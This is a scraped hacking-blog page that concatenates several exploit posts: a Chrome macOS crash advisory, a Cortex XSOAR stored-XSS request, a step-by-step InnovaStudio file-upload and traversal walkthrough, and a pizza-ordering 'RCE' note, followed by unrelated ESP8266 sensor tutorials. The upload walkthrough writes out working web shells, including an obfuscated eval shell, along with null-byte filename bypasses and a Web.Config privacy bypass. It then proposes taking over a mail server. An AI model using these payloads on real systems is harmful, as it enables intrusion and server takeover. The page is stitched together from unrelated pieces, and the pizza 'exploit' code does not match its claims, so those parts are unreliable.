## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Author: LiquidWorm
Vendor: Google LLC
Product web page: https://www.google.com
Affected version: 111.0.5563.64 (Official Build) (x86_64)
110.0.5481.100 (Official Build) (x86_64)
108.0.5359.124 (Official Build) (x86_64)
108.0.5359.98 (Official Build) (x86_64)
Fixed version: 112.0.5615.49 (Official Build) (x86_64)
Summary: Google Chrome browser is a free web browser used for
accessing the internet and running web-based applications. The
Google Chrome browser is based on the open source Chromium web
browser project. Google released Chrome in 2008 and issues several
updates a year.
Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
tabs on macOS.
Commit fix:
"The original cl landed many months ago, but
chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
is the only change that didn't revert cleanly."
macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
Implements accessibility hit testing for RemoteCocoa so that Hover Text
and VoiceOver mouse mode can read the accessible objects under the
user's pointer. Cross-process plumbing was needed because RemoteCocoa
bridges to native controls in a separate app shim process and must
report accessibility trees from the browser process via the
undocumented NSAccessibilityRemoteUIElement mechanism.
This CL does the following:
1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
in the browser process. This enables the browser process to accept
redirected accessibilityHitTest calls to the object corresponding to
any NSAccessibilityRemoteUIElement returned by the original
accessibilityHitTest at the app shim process.
2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
accessibilityHitTest to have a custom implementation with
NSAccessibilityRemoteUIElement support so that custom window
controls can be found. Additionally, adjusts the BrowserView bounds
so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
support view targeting) can return controls in the web app frame
toolbar.
3. (For Web Content) Implements RenderWidgetHostViewCocoa's
accessibilityHitTest for instances in the app shim to return a
NSAccessibilityRemoteUIElement corresponding to their counterparts
in the browser process so that web content objects can be found.
Tested on: macOS 12.6.1 (Monterey)
macOS 13.3.1 (Ventura)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5770
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
08.12.2022
--
UI PoC:
-------
1. Grab a tab and detach it.
2. Bring back the tab.
3. Do this 2-3 times attaching / re-attaching the tab.
4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
5. Process crashes entirely.
Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
=============
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//
#include <ApplicationServices/ApplicationServices.h>
#include <iostream>
#include <sstream>
#include <vector>
__BEGIN_DECLS
// NOLINTNEXTLINE
AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
// NOLINTNEXTLINE
CFTypeID AXTextMarkerGetTypeID();
__END_DECLS
std::ostream& bold_on(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[1m";
}
return os;
}
std::ostream& bold_off(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[0m";
}
return os;
}
std::string from_cfstr(CFTypeRef cf_ref)
{
if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
{
const auto cf_str = static_cast<CFStringRef>(cf_ref);
const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding(
CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
auto result = std::string(max_length, '\0');
if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8))
{
if (const auto pos = result.find('\0'); pos != std::string::npos)
{
result.resize(pos);
}
return result;
}
}
return {};
}
std::string ax_element_id(AXUIElementRef value)
{
// AX element cache - AX elements are backed by CFData
// (referring to 'remote' AX objects) and this data is
// 'stable' across 'volatile' instances of AXUIElement.
// 'hash and equality' of AX elements are based on this
// data and therefore, we can use AXUIElement objects as
// 'keys' in a dictionary with values, identifying these
// objects (uniquely).
const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
auto ax_id = CFDictionaryGetValue(ax_elements, value);
if (ax_id == nullptr)
{
if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
{
if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
{
CFDictionarySetValue(ax_elements, value, uuid_s);
CFRelease(uuid_s);
}
CFRelease(uuid);
}
ax_id = CFDictionaryGetValue(ax_elements, value);
}
return from_cfstr(ax_id);
}
template <typename T>
T ax_attribute_value(AXUIElementRef e, CFStringRef name)
{
if (e != nullptr)
{
auto ref = T{};
if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
{
return ref;
}
}
return nullptr;
}
// NOLINTNEXTLINE
void ax_traverse(AXUIElementRef elem, uint32_t depth)
{
const auto max_depth = 10;
if (depth > max_depth)
{
return;
}
const auto indent = [&]()
{
for (auto x = 0; x < depth; x++)
{
std::cout << " ";
}
};
auto wid = CGWindowID{};
if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
{
wid = 0;
}
indent();
const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute);
std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
std::endl;
if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute))
{
for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
{
const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx));
ax_traverse(element, depth + 1);
}
CFRelease(children);
}
}
int main(int argc, char* const argv[])
{
auto pid = 0;
if (argc > 1)
{
if (!AXIsProcessTrusted())
{
std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
exit(1); // NOLINT
}
// NOLINTNEXTLINE
pid = std::stoi(argv[1]);
}
else
{
std::cerr << "usage: axtester <pid>" << std::endl;
exit(1); // NOLINT
}
if (const auto app = AXUIElementCreateApplication(pid))
{
auto observer = AXObserverRef{};
auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx)
{
auto myapp = (__AXUIElement*)(ctx);
auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8);
std::cout << "Hint: " << hint << std::endl;
ax_traverse(myapp, 0);
}, &observer);
if (kAXErrorSuccess != ret)
{
std::cerr << "Fail to create observer" << std::endl;
return -1;
}
std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
CFRunLoopRun();
}
return 0;
}
--codeaibot explains--
This is a C++ program that uses the Accessibility API (AX) provided
by macOS to traverse the user interface of a running application and
print out information about the accessibility elements that it finds.
The program takes a single argument, which is the process ID (PID) of
the application to examine. If no argument is provided, the program
displays a usage message and exits.
The main() function first checks if the Terminal app has been granted
accessibility privileges by calling the AXIsProcessTrusted() function.
If it hasn't, the program displays an error message and exits.
If the Terminal app has been granted accessibility privileges, the program
creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
function, passing in the PID as an argument.
The ax_traverse() function is then called with the root accessibility
element of the application as an argument. This function recursively
traverses the accessibility tree of the application, printing out
information about each element it encounters.
The program also defines several helper functions for working with Core
Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
as well as some functions for printing formatted output to the console
(bold_on() and bold_off()).
-- / --
As this issue is not a security issue nor results in security consequences,
this report is not eligible for a VRP reward.
++
Thank you Amy!
--
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863117910
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
Cortex XSOAR web interface enables an authenticated network-based attacker
to store a persistent javascript payload that will perform arbitrary
actions in the Cortex XSOAR web interface on behalf of authenticated
administrators who encounter the payload during normal operations.
POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token:
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
Regards,
Omur UGUR
>
# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##################################################################################################
# #
# ASP version, in i_upload_object_FSO.asp, line 234 #
# #
# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
# #
##################################################################################################
||==============================================================================||
|| ((((1)))) ||
|| ||
|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
" "
==================================================================================================
***
||================================================================================||
|| ((((2)))) ||
|| ||
|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
|| ||
||================================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" >>> filename="shell.asp%00asp.txt" <<< "
" "
" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode "
" "
" or "
" "
" CTRL+Shift+U "
" "
" SEND! "
" "
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
" "
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
" "
==================================================================================================
***
||==============================================================================||
|| ((((3)))) ||
|| ||
|| ...:::NO WRITE PERMISSION!:::... ||
|| ||
|| ...:::Directory Traversal:::... ||
|| ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0600 ] "
" "
" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
" "
" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
" "
" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
" "
" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
" "
" "
##################################################################################################
##########################################################################################################################################################
# #
# What is the App_Data Folder useful? #
# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the Home Directory. #
# Because it's a private directory, the IIS server hides it for security reasons. #
# Now, we will test whether such a directory exists. #
# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. #
# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
# So the directory will be public and it will be able to respond to external queries and run a shell. #
# #
##########################################################################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream
<configuration>
<system.webServer>
<defaultDocument>
<files>
<add value="*.asp" />
<add value="*.aspx" />
<add value="*.php" />
</files>
</defaultDocument>
<security>
<requestFiltering>
<hiddenSegments>
<clear />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
" "
" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
" "
==================================================================================================
# Now we will upload your shell to the directory where we made ByPass. #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
======================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
" "
" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
" "
==========================================================================================================================================
" "
" So what can we do if no directory on the site has write permission? "
" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
" Sometimes this can be a mail service related vulnerability, "
" Sometimes also it can be a "Service Permissions" vulnerability. "
" Sometimes also it can be a "Binary Permissions " vulnerability. "
" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
" Sometimes also it can be a "Unquoted Service Path" vulnerability. "
" Our limits are as much as our imagination... "
" *** 0DAY *** "
" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. "
" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
" And then upload our shell file to the server by bypassing it. "
" This way, we will have full control over both the server and the mail service. "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
" "
==========================================================================================================================================
## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 03.30.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell,
this is because he can access the upload function from the
administrator account.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
```mysql
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
## Proof and Exploit:
[href](https://streamable.com/szb9qy)
## Time spend:
00:45:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Title: esp8266 Relay WiFi
HACKER · %s · %s
List
esp8266 board one software ESP8266Flasher
Instructions:
Download the firmware that is flashed first, esp8266 wifi relay firmware
In the firmware,0x00000.bin is written to the address0x00000, and0x10000.bin file is written to the address0x10000.
As shown in the figure
After the flashing is completed, MYAP's ssid will appear
Access after connection 192.168.4.1
Configure
Internet speed test Advantages and disadvantages Advantages: Small and convenient, simple and practical, the most important thing is cheap~ Disadvantages: Low efficiency, easy to disconnect, and slow network speed.
- Read more...
- 0 comments
- 1 view
Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 2 views
Title: esp8266(nodemcu) +DHT11 temperature and humidity sensor
HACKER · %s · %s
Equipment List
NodeMCU development board one DHT11 temperature and humidity sensor one
(DHT11 module)
(NodeMcu board)
DHT11 detects water vapor by measuring the resistance between two electrodes. A moisturizing substrate with electrodes on the surface of the humidity detection component.
When water vapor is absorbed by the substrate, ions are released by the substrate, and this process will increase the conductivity between the electrodes.
The resistance change between the two electrodes is proportional to the relative humidity.
Higher relative humidity reduces the resistance between electrodes, while lower relative humidity increases the resistance between electrodes.
How to connect DHT11 on NodeMCU
Connecting the DHT11 to the NodeMCU is simple, but the connection method varies depending on whether you are using a 3-pin sensor or a 4-pin sensor.
The connection method is as follows:
The +3V pin of the nodemcu is marked on the DHT11 with the (+ or VCC) pin.
DHT11 is marked with the (S or OUT) pin to connect to the D4V pin of nodemcu.
The GND pin of the nodemcu connected to the GND pin marked with the (- or GND) pin on DHT11.
The code is as follows
#include SimpleDHT.h
//for DHT11,
//VCC: 5V or 3V
//GND: GND
//DATA: 2
int pinDHT11=2;
SimpleDHT11 dht11(pinDHT11);
void setup() {
Serial.begin(115200);
}
void loop() {
//start working.
Serial.println('=================================');
Serial.println('Sample DHT11.');
//read without samples.
byte temperature=0;
byte humidity=0;
int err=SimpleDHTErrSuccess;
if ((err=dht11.read(temperature, humidity, NULL)) !=SimpleDHTErrSuccess) {
Serial.print('Read DHT11 failed, err='); Serial.println(err); delay(1000);
return;
}
Serial.print('Sample OK:');
Serial.print((int)temperature); Serial.print(' *C, ');
Serial.print((int)humidity); Serial.println(' H');
//DHT11 sampling rate is 1HZ.
delay(1500);
}github address
User Demo
DHT11+WEB version
Let's take a look at the effect first
Feedback the DHT11 data through the web server.
Development ideas
We first need to install two libraries DHT and Adafruit Unified Sensor
The code is as follows:
#include ESP8266WiFi.h
#include ESP8266WebServer.h
#include 'DHT.h'
//Uncomment one of the lines below for whatever DHT sensor type you're using!
#define DHTTYPE DHT11 //DHT 11
//#define DHTTYPE DHT21 //DHT 21 (AM2301)
//#define DHTTYPE DHT22 //DHT 22 (AM2302), AM2321
/*Put your SSID Password*/
const char* ssid='kali'; //Enter SSID here
const char* password='12345678900'; //Enter Password here
ESP8266WebServer server(80);
//DHT Sensor
uint8_t DHTPin=D4;
//Initialize DHT sensor.
DHT dht(DHTPin, DHTTYPE);
float Temperature;
float Humidity;
void setup() {
Serial.begin(115200);
delay(100);
pinMode(DHTPin, INPUT);
dht.begin();
Serial.println('Connecting to ');
Serial.println(ssid);
//connect to your local wi-fi network
WiFi.begin(ssid, password);
//check wi-fi is connected to wi-fi network
while (WiFi.status() !=WL_CONNECTED) {
delay(1000);
Serial.print('.');
}
Serial.println('');
Serial.println('WiFi connected.');
Serial.print('Got IP:'); Serial.println(WiFi.localIP());
server.on('/', handle_OnConnect);
server.onNotFound(handle_NotFound);
server.begin();
Serial.println('HTTP server started');
}
void loop() {
server.handleClient();
}
void handle_OnConnect() {
Temperature=dht.readTemperature(); //Gets the values of the temperature
Humidity=dht.readHumidity(); //Gets the values of the humidity
server.send(200, 'text/html', SendHTML(Temperature, Humidity));
}
void handle_NotFound(){
server.send(404, 'text/plain', 'Not found');
}
